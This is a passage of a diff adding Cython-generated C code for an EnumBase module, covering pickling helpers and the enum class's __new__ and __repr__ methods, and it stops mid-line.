*)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_238750788); + __Pyx_GIVEREF(__pyx_int_238750788); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_238750788); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_238750788); + __Pyx_GIVEREF(__pyx_int_238750788); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_238750788); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) # <<<<<<<<<<<<<< + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 17, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle___Pyx_EnumMeta__set_state(__pyx_v_self, ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_1__new__ = {"__new__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_cls = 0; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_name = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__new__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_cls,&__pyx_n_s_value,&__pyx_n_s_name,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject *)Py_None)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_cls)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, 1); __PYX_ERR(1, 28, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 28, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__new__") < 0)) __PYX_ERR(1, 28, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_cls = values[0]; + __pyx_v_value = values[1]; + __pyx_v_name = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 28, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(__pyx_self, __pyx_v_cls, __pyx_v_value, __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name) { + PyObject *__pyx_v_v = NULL; + PyObject *__pyx_v_res = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__new__", 0); + + /* "EnumBase":29 + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_cls)) || PyTuple_CheckExact(__pyx_v_cls)) { + __pyx_t_1 = __pyx_v_cls; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_cls); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 29, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 29, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 29, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 29, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_v, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumBase":30 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * if name is None: + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_v, __pyx_v_value, Py_EQ); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 30, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(1, 30, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_5) { + + /* "EnumBase":31 + * for v in cls: + * if v == value: + * return v # <<<<<<<<<<<<<< + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_v); + __pyx_r = __pyx_v_v; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":30 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * if name is None: + */ + } + + /* "EnumBase":29 + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":32 + * if v == value: + * return v + * if name is None: # <<<<<<<<<<<<<< + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + */ + __pyx_t_5 = (__pyx_v_name == Py_None); + if (unlikely(__pyx_t_5)) { + + /* "EnumBase":33 + * return v + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) # <<<<<<<<<<<<<< + * res = int.__new__(cls, value) + * res.name = name + */ + __pyx_t_1 = __Pyx_PyString_FormatSafe(__pyx_kp_s_Unknown_enum_value_s, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 33, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_builtin_ValueError, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 33, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 33, __pyx_L1_error) + + /* "EnumBase":32 + * if v == value: + * return v + * if name is None: # <<<<<<<<<<<<<< + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + */ + } + + /* "EnumBase":34 + * if name is None: + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) # <<<<<<<<<<<<<< + * res.name = name + * setattr(cls, name, res) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyInt_Type)), __pyx_n_s_new); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_6, __pyx_v_cls, __pyx_v_value}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 34, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_res = __pyx_t_4; + __pyx_t_4 = 0; + + /* "EnumBase":35 + * raise ValueError("Unknown enum value: '%s'" % value) + * res = int.__new__(cls, value) + * res.name = name # <<<<<<<<<<<<<< + * setattr(cls, name, res) + * cls.__members__[name] = res + */ + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_v_name) < 0) __PYX_ERR(1, 35, __pyx_L1_error) + + /* "EnumBase":36 + * res = int.__new__(cls, value) + * res.name = name + * setattr(cls, name, res) # <<<<<<<<<<<<<< + * cls.__members__[name] = res + * return res + */ + __pyx_t_8 = PyObject_SetAttr(__pyx_v_cls, __pyx_v_name, __pyx_v_res); if (unlikely(__pyx_t_8 == ((int)-1))) __PYX_ERR(1, 36, __pyx_L1_error) + + /* "EnumBase":37 + * res.name = name + * setattr(cls, name, res) + * cls.__members__[name] = res # <<<<<<<<<<<<<< + * return res + * def __repr__(self): + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_cls, __pyx_n_s_members); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 37, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely((PyObject_SetItem(__pyx_t_4, __pyx_v_name, __pyx_v_res) < 0))) __PYX_ERR(1, 37, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":38 + * setattr(cls, name, res) + * cls.__members__[name] = res + * return res # <<<<<<<<<<<<<< + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_res); + __pyx_r = __pyx_v_res; + goto __pyx_L0; + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_v); + __Pyx_XDECREF(__pyx_v_res); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_3__repr__ = {"__repr__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 39, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__repr__") < 0)) __PYX_ERR(1, 39, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__repr__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 39, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "EnumBase":40 + * return res + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) # <<<<<<<<<<<<<< + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = 